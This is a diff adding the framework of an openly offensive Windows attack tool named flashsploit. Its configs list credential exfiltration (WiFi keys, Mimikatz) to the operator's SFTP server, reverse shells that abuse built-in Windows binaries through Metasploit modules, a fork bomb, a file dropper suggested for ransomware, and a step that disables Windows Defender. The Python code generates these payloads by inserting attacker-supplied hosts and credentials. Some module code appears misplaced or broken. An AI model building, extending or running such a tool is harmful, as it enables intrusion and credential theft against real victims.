Uploaded files

Author: thewhiteh4t

conf/exfil_scripts.json

@@ -0,0 +1,17 @@
+{
+	"wifi_key_grabber": {
+		"desc": "Extracts All WiFi Passwords and Uploads xml to your SFTP Server",
+		"sftp": 1,
+		"msf": 0
+	},
+	"netinfo": {
+		"desc": "Extracts Network Configuration Information of Target System and Uploads to your SFTP Server",
+		"sftp": 1,
+		"msf": 0
+	},
+	"mimikatz": {
+		"desc": "Extracts Passwords and Other Critical Information using Mimikatz and Uploads to your SFTP Server",
+		"sftp": 1,
+		"msf": 0
+	}
+}

conf/misc_scripts.json

@@ -0,0 +1,22 @@
+{
+	"change_wallpaper": {
+		"desc": "Changes Wallpaper of Target Machine",
+		"url": 1,
+		"server": 0
+	},
+	"fork_bomb": {
+		"desc": "Make Windows Unresponsive using a .bat Script ( 100% CPU and RAM Usage )",
+		"url": 0,
+		"server": 0
+	},
+	"dropper": {
+		"desc": "Drop and Execute a File of your Choice, ransomware maybe... ;)",
+		"url": 0,
+		"server": 1
+	},
+	"anti_defender": {
+		"desc": "Disables Windows Defender Service on Target Machine",
+		"url": 0,
+		"server": 0
+	}
+}

conf/rshell_scripts.json

@@ -0,0 +1,50 @@
+{
+	"hta": {
+		"desc": "Get Reverse Shell by Abusing Microsoft HTML Apps (mshta)",
+		"sftp": 0,
+		"msf": 1,
+		"module": "exploit/windows/misc/hta_server",
+		"srv": 1,
+		"target": "0"
+	},
+	"certutil": {
+		"desc": "Get Reverse Shell by Abusing Certification Authority Utility (certutil)",
+		"sftp": 0,
+		"module": "exploit/multi/handler",
+		"msf": 1,
+		"srv": 0,
+		"target": "0"
+	},
+	"cscript": {
+		"desc": "Get Reverse Shell by Abusing Windows Script Host (csript)",
+		"sftp": 0,
+		"module": "exploit/multi/handler",
+		"msf": 1,
+		"srv": 0,
+		"target": "0"
+	},
+	"msiexec": {
+		"desc": "Get Reverse Shell by Abusing Windows Installer (msiexec)",
+		"sftp": 0,
+		"module": "exploit/multi/handler",
+		"msf": 1,
+		"srv": 0,
+		"target": "0"
+	},
+	"regsvr": {
+		"desc": "Get Reverse Shell by Abusing Microsoft Register Server Utility (regsvr32)",
+		"sftp": 0,
+		"module": "exploit/multi/script/web_delivery",
+		"msf": 1,
+		"srv": 1,
+		"target": "3"
+	},
+	"rundll": {
+		"desc": "Get Reverse Shell by Abusing Rundll32",
+		"sftp": 0,
+		"module": "exploit/windows/smb/smb_delivery",
+		"msf": 1,
+		"srv": 1,
+		"target": "0"
+	}
+}

conf/sftp.conf

@@ -0,0 +1 @@
+username:password

flashsploit.py

@@ -0,0 +1,83 @@
+#!/usr/bin/env python3
+
+import os
+import subprocess as subp
+from modules.misc import misc
+from modules.exfil import exfil
+from modules.reverse_shell import rshell
+
+R = '\033[31m' # red
+G = '\033[32m' # green
+C = '\033[36m' # cyan
+W = '\033[0m'  # white
+
+version = '1.0.0'
+
+def banner():
+	os.system('clear')
+	banner = r'''
+    ______           __               __      _ __ 
+   / __/ /___ ______/ /_  _________  / /___  (_) /_
+  / /_/ / __ `/ ___/ __ \/ ___/ __ \/ / __ \/ / __/
+ / __/ / /_/ (__  ) / / (__  ) /_/ / / /_/ / / /_  
+/_/ /_/\__,_/____/_/ /_/____/ .___/_/\____/_/\__/  
+                           /_/                     
+'''
+	print(G + banner + W)
+	print(G + '[+]' + C + ' Created By : ' + W + 'thewhiteh4t')
+	print(G + '[+]' + C + ' Version    : ' + W + version)
+
+def main():
+	print('\n' + G + '[+]' + C + ' Choose Target : ' + W + '\n')
+	print(G + '[1]' + C + ' Windows' + W)
+	while True:
+		choice = input(G + '\nfs > ' + W)
+
+		if choice == '1':
+			win()
+		elif choice == 'exit' or choice == 'quit':
+			subp.call(['systemctl', 'stop', 'ssh.service'])
+			subp.call(['pkill', 'php'])
+			exit()
+		else:
+			print('\n' + R + '[-]' + C + ' Invalid Input...' + W)
+			pass
+
+def win():
+	print('\n', end='')
+	print(G + '[1]' + C + ' exfil' + W)
+	print(G + '[2]' + C + ' reverse_shell' + W)
+	print(G + '[3]' + C + ' misc' + W)
+	
+	while True:
+		win_choice = input(G + '\nfs[windows] > ' + W)
+		
+		if win_choice == '1':
+			exfil(win)
+		elif win_choice == '2':
+			rshell(win)
+		elif win_choice == '3':
+			misc(win)
+		elif win_choice == 'clear':
+			os.system('clear')
+		elif win_choice == 'back':
+			return main()
+		elif win_choice == 'help':
+			return win()
+		elif win_choice == '':
+			pass
+		elif win_choice == 'exit' or win_choice == 'quit':
+			subp.call(['systemctl', 'stop', 'ssh.service'])
+			subp.call(['pkill', 'php'])
+			exit()
+		else:
+			print('\n' + R + '[-]' + C + ' Invalid Input...' + W)
+			pass
+
+try:
+	banner()
+	main()
+except KeyboardInterrupt:
+	print(R + '[-]' + C + ' Keyboard Interrupt.' + W)
+	subp.call(['systemctl', 'stop', 'ssh.service'])
+	subp.call(['pkill', 'php'])

modules/__init__.py

@@ -0,0 +1,80 @@
+#!/usr/bin/env python3
+
+import os
+import json
+from modules.sftp import sftp
+
+R = '\033[31m' # red
+G = '\033[32m' # green
+C = '\033[36m' # cyan
+W = '\033[0m'  # white
+
+def exfil(win):
+	print('\n', end='')
+	exfil_scripts = []
+	for (dirpath, dirname, filenames) in os.walk('scripts/windows/exfil'):
+		exfil_scripts.extend(filenames)
+	for item in exfil_scripts:
+		print(G + '[{}] '.format(exfil_scripts.index(item)) + C + item)
+	
+	while True:
+		exfil_choice = input(G + '\nfs[windows/exfil] > ' + W)
+				
+		if exfil_choice == 'clear':
+			os.system('clear')
+		elif exfil_choice == 'back':
+			return win()
+		elif exfil_choice == 'help':
+			return exfil(win)
+		elif exfil_choice == '':
+			pass
+		elif exfil_choice == 'exit' or exfil_choice == 'quit':
+			subp.call(['systemctl', 'stop', 'ssh.service'])
+			subp.call(['pkill', 'php'])
+			exit()
+		elif int(exfil_choice) <= len(exfil_scripts) - 1:
+			with open('conf/exfil_scripts.json', 'r') as json_file:
+				options = json.load(json_file)
+			try:
+				chosen = exfil_scripts[int(exfil_choice)]
+			
+				for k,v in options.items():
+					if k in chosen:
+						sftp_state = v['sftp']
+						msf_state = v['msf']
+						desc = v['desc']
+						print('\n', end = '')
+						print(G + '[+]' + C + ' Script : ' + W + chosen + '\n')
+						print(G + '[+]' + C + ' Info : ' + W + desc + '\n')
+						if sftp_state == 1:
+							sftp()
+						else:
+							pass
+						if msf_state == 1:
+							msf()
+						else:
+							pass
+						script_path = '/scripts/windows/exfil/' + chosen
+						exfil_output(script_path, chosen)
+			except ValueError:
+				pass
+		else:
+			print('\n' + R + '[-]' + C + ' Invalid Input...' + W)
+			pass
+
+def exfil_output(script_path, chosen):
+	base_path = os.getcwd() + script_path
+
+	with open(base_path, 'r') as file :
+		filedata = file.read()
+
+	filedata = filedata.replace('USERNAME', sftp.sftp_user)
+	filedata = filedata.replace('PASSWORD', sftp.sftp_pass)
+	filedata = filedata.replace('IPADDR', sftp.server_ip)
+
+	with open('output/{}'.format(chosen), 'w') as file:
+		file.write(filedata)
+
+	outfile_path = os.getcwd() + '/output/{}'.format(chosen)
+	
+	print(G + '[+]' + C + ' Script Generated : ' + W + outfile_path)

modules/exfil.py

@@ -0,0 +1,91 @@
+#!/usr/bin/env python3
+
+import os
+import json
+
+R = '\033[31m' # red
+G = '\033[32m' # green
+C = '\033[36m' # cyan
+W = '\033[0m'  # white
+
+def misc(win):
+	print('\n', end='')
+	misc_scripts = []
+	for (dirpath, dirname, filenames) in os.walk('scripts/windows/misc'):
+		misc_scripts.extend(filenames)
+	for item in misc_scripts:
+		print(G + '[{}] '.format(misc_scripts.index(item)) + W + item)
+
+	while True:
+		try:
+			misc_choice = input(G + '\nfs[windows/misc] > ' + W)		
+
+			if misc_choice == 'clear':
+				os.system('clear')
+			elif misc_choice == 'back':
+				return win()
+			elif misc_choice == 'help':
+				return misc(win)
+			elif misc_choice == '':
+				pass
+			elif misc_choice == 'exit' or misc_choice == 'quit':
+				subp.call(['systemctl', 'stop', 'ssh.service'])
+				subp.call(['pkill', 'php'])
+				exit()
+			elif int(misc_choice) <= len(misc_scripts) - 1:
+				with open('conf/misc_scripts.json', 'r') as json_file:
+					options = json.load(json_file)
+					chosen = misc_scripts[int(misc_choice)]
+			
+					for k,v in options.items():
+						if k in chosen:	
+							desc = v['desc']
+							url_state = v['url']
+							server_state = v['server']
+							print('\n', end = '')
+							print(G + '[+]' + C + ' Script : ' + W + chosen + '\n')
+							print(G + '[+]' + C + ' Info : ' + W + desc + '\n')
+							if url_state == 1:
+								misc.misc_url = input(G + '[+]' + C + ' URL : ' + W)
+							else:
+								pass
+							if server_state == 1:
+								misc.misc_host = input(G + '[+]' + C + ' Server Host : ' + W)
+								misc.misc_port = input(G + '[+]' + C + ' Server Port : ' + W)
+								misc.misc_fname = input(G + '[+]' + C + ' Filename (with extension) : ' + W)
+							script_path = '/scripts/windows/misc/' + chosen
+							misc_output(script_path, chosen, url_state, server_state)
+			else:
+				print('\n' + R + '[-]' + C + ' Invalid Input...' + W)
+				pass
+		except ValueError:
+			print('\n' + R + '[-]' + C + ' Invalid Input...' + W)
+			pass
+
+def misc_output(script_path, chosen, url_state, server_state):
+	base_path = os.getcwd() + script_path
+	outfile_path = os.getcwd() + '/output/{}'.format(chosen)
+
+	if url_state == 1:
+		with open(base_path, 'r') as file :
+			filedata = file.read()
+
+		filedata = filedata.replace('URL', misc.misc_url)
+
+		with open('output/{}'.format(chosen), 'w') as file:
+			file.write(filedata)
+	else:
+		os.system('cp {} {}'.format(base_path, outfile_path))
+	
+	if server_state == 1:
+		with open(base_path, 'r') as file :
+			filedata = file.read()
+
+		filedata = filedata.replace('HOST', misc.misc_host)
+		filedata = filedata.replace('PORT', misc.misc_port)
+		filedata = filedata.replace('FILENAME', misc.misc_fname)
+
+		with open('output/{}'.format(chosen), 'w') as file:
+			file.write(filedata)
+
+	print(G + '[+]' + C + ' Script Generated : ' + W + outfile_path)